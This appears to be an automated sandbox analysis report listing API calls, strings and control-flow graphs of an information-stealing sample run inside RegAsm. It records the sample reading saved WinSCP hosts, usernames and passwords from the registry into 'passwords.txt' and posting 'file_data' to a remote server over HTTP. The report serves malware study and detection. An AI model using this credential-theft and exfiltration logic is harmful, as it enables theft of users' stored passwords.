                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DD80), ref: 00418A62
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DCC0), ref: 00418A7A
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01564250), ref: 00418A93
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562C00), ref: 00418AAB
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DD68), ref: 00418AC3
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DD98), ref: 00418ADC
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DDB0), ref: 00418AF4
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DE58), ref: 00418B0C
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562A40), ref: 00418B25
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DE28), ref: 00418B3D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DDC8), ref: 00418B55
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DE40), ref: 00418B6E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DDF8), ref: 00418B86
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DE10), ref: 00418B9E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DE70), ref: 00418BB7
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DE88), ref: 00418BCF
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156DDE0), ref: 00418BE7
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,015712B0), ref: 00418C00
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,0156F108), ref: 00418C18
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,015713B8), ref: 00418C30
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01571490), ref: 00418C49
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562C20), ref: 00418C61
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,015714F0), ref: 00418C79
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562C40), ref: 00418C92
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01571520), ref: 00418CAA
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01571430), ref: 00418CC2
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562CE0), ref: 00418CDB
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,01562BE0), ref: 00418CF3
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(015714D8,00417D7D,?,00000040,00000064,00414180,00413720,?,0000002C,00000064,004140D0,00414120,?,00000024,00000064,00414080), ref: 00418D05
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(01571580), ref: 00418D16
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(01571418), ref: 00418D28
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(015712C8), ref: 00418D3A
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(01571388), ref: 00418D4B
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(01571478), ref: 00418D5D
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(015713A0), ref: 00418D6F
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(015713D0), ref: 00418D80
                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418D90
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,01562B20), ref: 00418DAC
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,01571460), ref: 00418DC4
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,0156F868), ref: 00418DDD
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,015713E8), ref: 00418DF5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000,01562D00), ref: 00418E0D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73B40000,01564340), ref: 00418E2D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73B40000,01562B60), ref: 00418E45
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73B40000,01564368), ref: 00418E5E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73B40000,015714A8), ref: 00418E76
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73B40000,01571400), ref: 00418E8E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73B40000,015629A0), ref: 00418EA7
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73B40000,01562B40), ref: 00418EBF
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73B40000,01571508), ref: 00418ED7
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,015629C0), ref: 00418EF3
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,01562CA0), ref: 00418F0B
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,015712E0), ref: 00418F24
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,015712F8), ref: 00418F3C
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000,01562A60), ref: 00418F54
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,01564480), ref: 00418F74
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,01564318), ref: 00418F8C
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,01571310), ref: 00418FA5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,01562D20), ref: 00418FBD
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,01562BA0), ref: 00418FD5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000,01564200), ref: 00418FEE
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,01571448), ref: 0041900E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,01562BC0), ref: 00419026
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,0156F818), ref: 0041903F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,01571538), ref: 00419057
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,01571298), ref: 0041906F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,01562A80), ref: 00419088
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,01562C80), ref: 004190A0
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,01571550), ref: 004190B8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,01571568), ref: 004190D1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,01562B00), ref: 004190ED
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,01571328), ref: 00419105
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,015714C0), ref: 0041911E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,01571340), ref: 00419136
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,01571358), ref: 0041914E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75450000,01562D40), ref: 0041916A
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75450000,01562CC0), ref: 00419182
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75DA0000,01562AE0), ref: 0041919E
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75DA0000,01571370), ref: 004191B6
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,01562AA0), ref: 004191D6
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,015629E0), ref: 004191EE
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,01562B80), ref: 00419207
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,015715B0), ref: 0041921F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,01562A00), ref: 00419237
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,01562A20), ref: 00419250
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,01562AC0), ref: 00419268
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,01571D00), ref: 00419280
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,HttpQueryInfoA), ref: 00419297
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,InternetSetOptionA), ref: 004192AE
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75AF0000,015715E0), ref: 004192CA
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75AF0000,0156F798), ref: 004192E2
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75AF0000,01571610), ref: 004192FB
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75AF0000,015715F8), ref: 00419313
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75D90000,01571D20), ref: 0041932F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6CD60000,01571628), ref: 0041934B
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6CD60000,01571BA0), ref: 00419363
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6CD60000,01571640), ref: 0041937C
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6CD60000,015715C8), ref: 00419394
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6CB70000,SymMatchString), ref: 004193AE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                  • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2238633743-951535364
                                                                                                                                                                                                                                                                                                  • Opcode ID: 642cb2aa3f8729086897cfb93ee94fc5d46d0139e4968153179ea6914fe78371
                                                                                                                                                                                                                                                                                                  • Instruction ID: 407128440629eddd766dc5e7512111eaeb079ed8883c8e88aed7a912d7e36e24
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 642cb2aa3f8729086897cfb93ee94fc5d46d0139e4968153179ea6914fe78371
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 876202BDA10620EFE754DFA5ED98A2637BBF74AB017106529EA05C3374E734A841CF60
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040C3F0 Relevance: 89.6, APIs: 36, Strings: 15, Instructions: 370registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C42B
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C44A
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C462
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C47A
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C48D
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C49B
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C4AC
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,"@), ref: 0040C4CE
                                                                                                                                                                                                                                                                                                  • RegGetValueA.ADVAPI32("@,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040C50F
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,"@), ref: 0040C547
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: memset$Open$Value
                                                                                                                                                                                                                                                                                                  • String ID: "@$:22$Host: $HostName$Login: $Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 2608732736-1877921674
                                                                                                                                                                                                                                                                                                  • Opcode ID: fb3acdcaa7eefa8502316789a7024bdd860385d8f84b5ea39cbb2eb7832996cd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2eae617b6bbfa68bfe5d41b46deb2d66e6faa0f044e0e836418075379cf6a55f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb3acdcaa7eefa8502316789a7024bdd860385d8f84b5ea39cbb2eb7832996cd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCD17BB590022DEFDB10DBE4CC85EEFBB7DAB48705F10455AF605A3280D7786E488BA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00404E40 Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 810networkstringmemoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 89 404e40-404f59 call 40fe60 call 404430 call 411720 call 4100c0 lstrlen call 4100c0 call 411720 call 40fe20 * 5 StrCmpCA 112 404f62-404f67 89->112 113 404f5b 89->113 114 404f87-4050ae call 411450 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff50 call 40ffe0 call 40ff00 call 40fea0 * 3 call 40ffe0 call 40ff50 call 40ff00 call 40fea0 * 2 InternetConnectA 112->114 115 404f69-404f81 call 4100c0 InternetOpenA 112->115 113->112 121 4057d5-405814 call 411380 * 2 call 410070 * 4 call 40fe60 114->121 184 4050b4-4050ec HttpOpenRequestA 114->184 115->114 115->121 149 405819-40589e call 40fea0 * 9 121->149 186 4050f2-4050f6 184->186 187 4057ce-4057cf InternetCloseHandle 184->187 188 4050f8-405108 InternetSetOptionA 186->188 189 40510e-405703 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 402450 call 40ff50 call 40ff00 call 40fea0 * 2 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ff50 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 40ffe0 call 40ff00 call 40fea0 call 4100c0 lstrlen call 4100c0 lstrlen GetProcessHeap HeapAlloc call 4100c0 lstrlen call 4100c0 memcpy call 4100c0 lstrlen memcpy call 4100c0 lstrlen call 4100c0 * 2 lstrlen memcpy call 4100c0 lstrlen call 4100c0 HttpSendRequestA call 411380 HttpQueryInfoA 186->189 187->121 188->189 396 405705-405714 call 40fe20 189->396 397 405719-40572d call 411350 189->397 396->149 402 405733-40574c InternetReadFile 397->402 403 40589f-4058ae call 40fe20 397->403 404 4057a5-4057bb call 4100c0 StrCmpCA 402->404 405 40574e 402->405 403->149 412 4057c4-4057cb InternetCloseHandle 404->412 413 4057bd-4057be ExitProcess 404->413 408 405750-405755 405->408 408->404 411 405757-4057a3 call 40ffe0 call 40ff00 call 40fea0 InternetReadFile 408->411 411->404 411->408 412->187
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411720: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411744
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411720: GetProcessHeap.KERNEL32(00000000,?,?,00404EBA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00411753
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411720: RtlAllocateHeap.NTDLL(00000000,?,?,00404EBA,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041175A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0156F958,00426897,00426893,0042688B,00426887,00426886), ref: 00404F51
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,?,?,?), ref: 00404F77
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050A1
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,0156F8F8,?,015724D8,00000000,00000000,-00400100,00000000), ref: 004050E2
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405108
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,0156F198,00000000,?,00426950,00000000,?,?), ref: 00405600
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00405612
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00405625
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040562C
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040563E
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00405652
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?), ref: 0040566B
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00405675
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00405686
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040569F
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 004056AC
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,00000000), ref: 004056C2
                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004056D3
                                                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004056FB
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,00000000), ref: 00405744
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,00000000,000007CF,00000000), ref: 0040579B
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 004057B3
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004057BE
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004057CF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$FileOpenReadRequestlstrcat$AllocAllocateBinaryCloseConnectCrackCryptExitHandleInfoOptionQuerySendString
                                                                                                                                                                                                                                                                                                  • String ID: ------$"$"$"$"$--$------$------$------$------$0$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                                                                                                                  • API String ID: 1135472144-3618031631
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1101776c67f9eaf2207cb236d24d32091fa0778eb9b540aedaa0788034abeadb
                                                                                                                                                                                                                                                                                                  • Instruction ID: 540930a84d7bb7e5f2c659243df0843e1f0a5bb5435f8e757a205e5e1652ed83
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1101776c67f9eaf2207cb236d24d32091fa0778eb9b540aedaa0788034abeadb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67622E71801149EADB15EBA1C951BEEBBB8AF19304F50407EE601731D2DF786A4CCBB5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040C890 Relevance: 73.9, APIs: 31, Strings: 11, Instructions: 398stringmemoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcpy.KERNEL32(00000000), ref: 0040FFB3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF50: lstrcat.KERNEL32(?,00000000), ref: 0040FFBF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
